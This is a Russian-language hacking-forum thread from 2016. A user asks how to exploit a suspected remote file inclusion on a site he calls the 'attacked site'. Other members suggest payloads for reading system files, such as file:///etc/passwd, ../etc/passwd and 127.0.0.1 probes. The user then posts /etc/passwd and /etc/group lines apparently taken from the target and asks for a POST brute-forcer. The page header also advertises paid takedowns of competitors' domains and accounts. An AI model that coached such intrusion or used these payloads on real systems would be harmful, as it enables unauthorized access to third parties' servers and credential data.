File include[помощь]

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
File include[помощь]

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

11.10.2016, 20:01

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).

11.10.2016, 20:05

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

↑
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).

Так и должно быть.. Ну не совсем может там не инклуд вовсе

11.10.2016, 20:07

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Так и должно быть

Ну а как мне увидить phpinfo атакуемого сайта?

11.10.2016, 20:15

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от sinfo

↑
Ну а как мне увидить phpinfo атакуемого сайта?

а зачем тебе phpinfo атакуемого сайта?

вопрос вообще про инклуд сначала был

/etc/shells /etc/passwd по классике попробуй проинклудить

11.10.2016, 20:46

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от t0ma5

↑
а зачем тебе phpinfo атакуемого сайта?
вопрос вообще про инклуд сначала был
/etc/shells /etc/passwd по классике попробуй проинклудить

Так если у него инклуд нахрена это всё,тем более если РФИ

11.10.2016, 20:47

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

site.com/blablabla=

Цитата:

Сообщение от sinfo

↑
Ну а как мне увидить phpinfo атакуемого сайта?

site=i.txt

в i.txt

а что если, file:///etc/passwd || http://127.0.0.1:80

11.10.2016, 21:18

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
site.com/blablabla=
site=i.txt
в i.txt
а что если, file:///etc/passwd ||
http://127.0.0.1:80

в i.txt - открыл как текстовый тхт.

file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((

11.10.2016, 21:35

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

↑
в i.txt - открыл как текстовый тхт.
file:///etc/passwd ||
http://127.0.0.1:80
- нет результатов(((

тогда это не инклуд

11.10.2016, 23:01

strelok20094

Познающий

Регистрация: 26.03.2011

Сообщений: 81

Провел на форуме:
24770

Репутация: 2

так ты файл читать можешь локальный?

file:///etc/passwd

/blablabla=../etc/passwd

#10

12.10.2016, 00:47

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

file:///etc/passwd да вот только что нашел,ток в другом месте

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

/etc/group

crontab:x:102:

Debian-exim:x:103:

mlocate:x:104:

ssh:x:105:

А есть брут??работающий с post запросами?

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход